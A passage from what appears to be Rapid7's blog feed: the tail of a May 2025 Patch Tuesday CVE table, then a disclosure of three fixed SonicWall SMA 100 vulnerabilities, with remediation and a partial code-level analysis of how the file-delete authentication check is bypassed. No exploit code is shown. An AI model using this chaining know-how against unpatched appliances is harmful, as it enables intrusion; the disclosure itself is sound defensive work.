href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-33072">CVE-2025-33072</a></td><td>Microsoft msagsfeedback.azurewebsites.net Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>8.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29973">CVE-2025-29973</a></td><td>Microsoft Azure File Sync Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr></tbody></table><h3>Azure Windows vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27488">CVE-2025-27488</a></td><td>Microsoft Windows Hardware Lab Kit (HLK) Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>6.7</td></tr></tbody></table><h3>Browser vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29825">CVE-2025-29825</a></td><td>Microsoft Edge (Chromium-based) Spoofing Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-4372">CVE-2025-4372</a></td><td>Chromium: CVE-2025-4372 Use after free in WebAudio</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-4096">CVE-2025-4096</a></td><td>Chromium: CVE-2025-4096 Heap buffer overflow in HTML</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-4052">CVE-2025-4052</a></td><td>Chromium: CVE-2025-4052 Inappropriate implementation in DevTools</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-4051">CVE-2025-4051</a></td><td>Chromium: CVE-2025-4051 Insufficient data validation in DevTools</td><td>No</td><td>No</td><td>N/A</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-4050">CVE-2025-4050</a></td><td>Chromium: CVE-2025-4050 Out of bounds memory access in DevTools</td><td>No</td><td>No</td><td>N/A</td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29813">CVE-2025-29813</a></td><td>Azure DevOps Server Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>10</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26646">CVE-2025-26646</a></td><td>.NET, Visual Studio, and Build Tools for Visual Studio Spoofing Vulnerability</td><td>No</td><td>No</td><td>8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32702">CVE-2025-32702</a></td><td>Visual Studio Remote Code Execution Vulnerability</td><td>No</td><td>Yes</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21264">CVE-2025-21264</a></td><td>Visual Studio Code Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>7.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32703">CVE-2025-32703</a></td><td>Visual Studio Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr></tbody></table><h3>ESU Windows vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29962">CVE-2025-29962</a></td><td>Windows Media Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29966">CVE-2025-29966</a></td><td>Remote Desktop Client Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29967">CVE-2025-29967</a></td><td>Remote Desktop Client Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32701">CVE-2025-32701</a></td><td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td><td>Yes</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32706">CVE-2025-32706</a></td><td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td><td>Yes</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30385">CVE-2025-30385</a></td><td>Windows Common Log File System Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32709">CVE-2025-32709</a></td><td>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</td><td>Yes</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32707">CVE-2025-32707</a></td><td>NTFS Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24063">CVE-2025-24063</a></td><td>Kernel Streaming Service Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29831">CVE-2025-29831</a></td><td>Windows Remote Desktop Services Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30397">CVE-2025-30397</a></td><td>Scripting Engine Memory Corruption Vulnerability</td><td>Yes</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29969">CVE-2025-29969</a></td><td>MS-EVEN RPC Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29833">CVE-2025-29833</a></td><td>Microsoft Virtual Machine Bus (VMBus) Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.1</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27468">CVE-2025-27468</a></td><td>Windows Kernel-Mode Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29959">CVE-2025-29959</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29960">CVE-2025-29960</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29830">CVE-2025-29830</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29832">CVE-2025-29832</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29836">CVE-2025-29836</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29958">CVE-2025-29958</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29961">CVE-2025-29961</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29835">CVE-2025-29835</a></td><td>Windows Remote Access Connection Manager Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29968">CVE-2025-29968</a></td><td>Active Directory Certificate Services (AD CS) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29957">CVE-2025-29957</a></td><td>Windows Deployment Services Denial of Service Vulnerability</td><td>No</td><td>No</td><td>6.2</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30394">CVE-2025-30394</a></td><td>Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>5.9</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29954">CVE-2025-29954</a></td><td>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>5.9</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29974">CVE-2025-29974</a></td><td>Windows Kernel Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29837">CVE-2025-29837</a></td><td>Windows Installer Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29956">CVE-2025-29956</a></td><td>Windows SMB Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29839">CVE-2025-29839</a></td><td>Windows Multiple UNC Provider Driver Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>4</td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47732">CVE-2025-47732</a></td><td>Microsoft Dataverse Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29826">CVE-2025-29826</a></td><td>Microsoft Dataverse Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.3</td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30377">CVE-2025-30377</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30386">CVE-2025-30386</a></td><td>Microsoft Office Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32704">CVE-2025-32704</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30382">CVE-2025-30382</a></td><td>Microsoft SharePoint Server Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29976">CVE-2025-29976</a></td><td>Microsoft SharePoint Server Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29978">CVE-2025-29978</a></td><td>Microsoft PowerPoint Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-32705">CVE-2025-32705</a></td><td>Microsoft Outlook Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29977">CVE-2025-29977</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29979">CVE-2025-29979</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30375">CVE-2025-30375</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30376">CVE-2025-30376</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30379">CVE-2025-30379</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30381">CVE-2025-30381</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30383">CVE-2025-30383</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30393">CVE-2025-30393</a></td><td>Microsoft Excel Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30384">CVE-2025-30384</a></td><td>Microsoft SharePoint Server Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30378">CVE-2025-30378</a></td><td>Microsoft SharePoint Server Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7</td></tr></tbody></table><h3>Microsoft Office ESU Windows vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30388">CVE-2025-30388</a></td><td>Windows Graphics Component Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr></tbody></table><h3>System Center vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26684">CVE-2025-26684</a></td><td>Microsoft Defender Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>6.7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26685">CVE-2025-26685</a></td><td>Microsoft Defender for Identity Spoofing Vulnerability</td><td>No</td><td>Yes</td><td>6.5</td></tr></tbody></table><h3>Windows vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29964">CVE-2025-29964</a></td><td>Windows Media Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29840">CVE-2025-29840</a></td><td>Windows Media Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29963">CVE-2025-29963</a></td><td>Windows Media Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-30400">CVE-2025-30400</a></td><td>Microsoft DWM Core Library Elevation of Privilege Vulnerability</td><td>Yes</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29970">CVE-2025-29970</a></td><td>Microsoft Brokering File System Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26677">CVE-2025-26677</a></td><td>Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29971">CVE-2025-29971</a></td><td>Web Threat Defense (WTD.sys) Denial of Service Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29842">CVE-2025-29842</a></td><td>UrlMon Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29838">CVE-2025-29838</a></td><td>Windows ExecutionContext Driver Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.4</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29841">CVE-2025-29841</a></td><td>Universal Print Management Service Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29955">CVE-2025-29955</a></td><td>Windows Hyper-V Denial of Service Vulnerability</td><td>No</td><td>No</td><td>6.2</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29829">CVE-2025-29829</a></td><td>Windows Trusted Runtime Interface Driver Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr></tbody></table><div><h4>NEVER MISS AN EMERGING THREAT</h4><p>Be the first to learn about the latest vulnerabilities and cybersecurity news.</p><a href="#">Subscribe Now</a></div>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/05/13/patch-tuesday-may-2025</link>
      <guid isPermaLink="false">blte2b5910769fb2291</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 13 May 2025 20:58:33 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Multiple vulnerabilities in SonicWall SMA 100 series (FIXED)]]></title>
      <description><![CDATA[<h2>Overview</h2><p>In April of 2025, Rapid7 discovered and disclosed three new vulnerabilities affecting SonicWall <a href="https://www.sonicwall.com/products/remote-access/secure-mobile-access-100-series">Secure Mobile Access (“SMA”) 100 series</a> appliances (SMA 200, 210, 400, 410, 500v). These vulnerabilities are tracked as CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821. An attacker with access to an SMA SSLVPN user account can chain these vulnerabilities to make a sensitive system directory writable, elevate their privileges to SMA administrator, and write an executable file to a system directory. This chain results in root-level remote code execution. These vulnerabilities have been fixed in version <a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0011">10.2.1.15-81sv</a>.</p><p>Rapid7 would like to thank the SonicWall security team for quickly responding to our disclosure and going above and beyond over a holiday weekend to get a patch out.</p><h2>Vulnerability table</h2><table cols="4" colWidths="250,250,250,250"><thead><tr><th>CVE</th><th>Description</th><th>Affected Service</th><th>CVSS</th></tr></thead><tbody><tr><td>CVE-2025-32819</td><td>An authenticated attacker with user privileges can delete any file on the SMA appliance as root to perform privilege escalation to the administrator account. <em>Based on known (private) IOCs and Rapid7 incident response investigations, we believe this vulnerability may have been used in the wild.</em></td><td>HTTP (Port 80), HTTPS (Port 443)</td><td><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">8.8 (High)</a></td></tr><tr><td>CVE-2025-32820</td><td>An authenticated attacker with user privileges can inject a path traversal sequence to make any directory on the SMA appliance writable by all users, including the nobody user. Any existing file on the system can also be overwritten with junk contents as root.</td><td>HTTP (Port 80), HTTPS (Port 443)</td><td><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H">8.3 (High)</a></td></tr><tr><td>CVE-2025-32821</td><td>An authenticated attacker with administrator privileges can inject shell command arguments to upload a fully controlled file anywhere that the nobody user can write to.</td><td>HTTP (Port 80), HTTPS (Port 443)</td><td><a href="https://www.first.org/cvss/calculator/3-0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:H">6.7 (Medium)</a></td></tr></tbody></table><h2>Credit</h2><p>These vulnerabilities were discovered by Ryan Emmons, Staff Security Researcher at Rapid7, and are being disclosed in accordance with Rapid7’s <a href="/security/disclosure/">coordinated vulnerability disclosure policy</a>.</p><h2>Remediation</h2><p>To remediate CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821, SonicWall SMA administrators should update to the latest version, <a href="https://www.sonicwall.com/support/technical-documentation/docs/sma_100-10-2-1-release_notes/Content/release_notes.htm">10.2.1.15-81sv</a>. For additional information, please see SonicWall’s <a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0011">advisory</a>.</p><h2>Rapid7 customers</h2><p>InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821 with an unauthenticated vulnerability check expected to be available in today’s (May 7) content release.</p><h2>Analysis</h2><p>The appliance tested was ”SMA 500v for ESXi” running version 10.2.1.14-75sv, the latest available at the time of research.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd09d086d1deaccea/68497c694799487995ba409a/blog-sonicwall-1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-1.png" asset-alt="blog-sonicwall-1.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd09d086d1deaccea/68497c694799487995ba409a/blog-sonicwall-1.png" data-sys-asset-uid="bltd09d086d1deaccea" data-sys-asset-filename="blog-sonicwall-1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-1.png" sys-style-type="display"/></p><h3>CVE-2025-32819</h3><p>An attacker with access to a low-privilege SMA user account can delete any file as root. This vulnerability appears to be a patch bypass for a previously reported arbitrary file delete vulnerability. That original vulnerability was <a href="https://www.nccgroup.com/us/research-blog/technical-advisory-sonicwall-sma-100-series-unauthenticated-arbitrary-file-deletion/">disclosed by NCC Group in 2021</a>, and a patch was previously released in the 10.2.0.9-41sv and 10.2.1.3-27sv patch cycle. Rapid7 is not aware of any specific CVE assigned to this original vulnerability; the NCC Group blog post states that a CVE was not shared with them, and we didn’t see a clear 1:1 match on the SonicWall PSIRT page.</p><p>Based on our testing, the unauthenticated arbitrary file delete vulnerability disclosed by NCC Group was patched by adding an authentication check. However, that authentication check is satisfied with a valid low-privilege session cookie, so exploitation is still viable. An attacker can exploit this vulnerability with low privileges to elevate to SMA administrator. This can be chained with CVE-2025-32820 and CVE-2025-32821 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. <em>Note: Based on known (private) IOCs and Rapid7 incident response investigations, we believe this vulnerability may have been used in the wild.</em></p><p>In /usr/src/EasyAccess/www/conf/httpd.conf, we observe that the /fileshare/sonicfiles web path is mapped to the sonicfiles.py Flask application.</p><pre>WSGIScriptAliasMatch ^/fileshare/sonicfiles /usr/src/EasyAccess/www/python/sonicfiles/sonicfiles.py
WSGIScriptAliasMatch ^/report    /usr/src/EasyAccess/www/python/sonicfiles/report.py
WSGIScriptAliasMatch ^/threat/__api__/v1 /usr/src/EasyAccess/www/python/authentication_api/threat_api.py
</pre><p>Within sonicfiles.py, we find the function main_handler, which is a main function that enforces authentication checks and dispatches various “RacNumber” SMB operations. At [A], we see an authorization check being performed before the primary API functionality is reachable.</p><pre>@application.route('/sonicfiles', methods=['GET', 'POST']) 
@application.route('/', methods=['GET', 'POST'])
def main_handler():

    #Get the required config if its not set
    #application.get_config()
    prog = 'fileexplorer'

    '''Alternate method for CSRF

    referrer = request.referrer
    parsed_referrer = urlparse(request.referrer)
    if((referrer is None) or (parsed_referrer.hostname != request.host)):
        print("Referrer something is wrong")
        return HttpErrorCode["NOT_PERMITTED_AUTH"]
    '''

    #set the log level to Debug when don't get the setting from SMA settings.
    application.set_log_level(logging.DEBUG)

    authResult = application.authorizationCheck() # [A]
    if authResult:
        response = make_response(str(HttpErrorCode["NOT_PERMITTED_AUTH"][0])) 
        response.headers['content-type'] = 'text/plain'
        response.headers['Cache-Control'] = 'no-cache'
        logger.info("::SONICFILES:: Authorization check failed {}".format(authResult))
        return response, HttpErrorCode["NOT_PERMITTED_AUTH"][1]

    racNum = request.args.get('RacNumber', RacNumber.RAC_INVALID, int)
    if racNum is RacNumber.RAC_INVALID:
        return 'Invalid invocation', 500 

    smbshare = FileShare(application)
[..SNIP..]
</pre><p>Let’s investigate what application.authorizationCheck is. It’s defined in pythonApi.py:</p><pre> def authorizationCheck(self):
        return self.api.authorizationCheck(self.get_connection_id(), request.method, request.args.get('swcctn'))
</pre><p>The self.get_connection_id function is depicted below. It fetches the swap cookie ([B]), which is the primary session cookie, then decodes it as base64 ([C]) and returns it.</p><pre>  @staticmethod
    def get_connection_id():
        if (SONICFILES_UNIT_TEST_MODE):
            #connection = request.args.get('sessionid', "", string)
            sessionid = request.args.get('sessionid')
            connection = base64.b64decode(sessionid).decode('utf-8')
            print(connection)
            return connection

        swap = request.cookies.get("swap") # [B]
        if swap == None:
            return ""

        connection = base64.b64decode(swap).decode('utf-8') # [C]
        mask_connection = connection.replace(connection[4:-4], (len(connection)-8) * '*') # abcd***...***ABCD
        logger.debug("::SONICFILES:: session {}".format(mask_connection))
        return connection
</pre><p>Since the primary authorizationCheck function is a <a href="https://www.swig.org/">SWIG</a> function implemented in native code, the decompiled cleaned up C for that is depicted below. It calls sessionGetAndRefresh ([D]), which queries the web application’s SQLite primary database on disk, to determine whether the provided session is an authenticated one. If it’s valid (and if the CSRF token matches when the ‘POST’ method is used), it returns a success code ([E]).</p><pre>0001b2e0    int32_t authorizationCheck(int32_t sessionId, char* method, int32_t swcctn)

0001b2e0    {
0001b2e0        int32_t currentSessionId = sessionId;
0001b315        int32_t sessionHandle = sessionGetAndRefresh(dbhGet(0), currentSessionId); // [D]
0001b31a        bool match = !sessionHandle;
0001b31a        
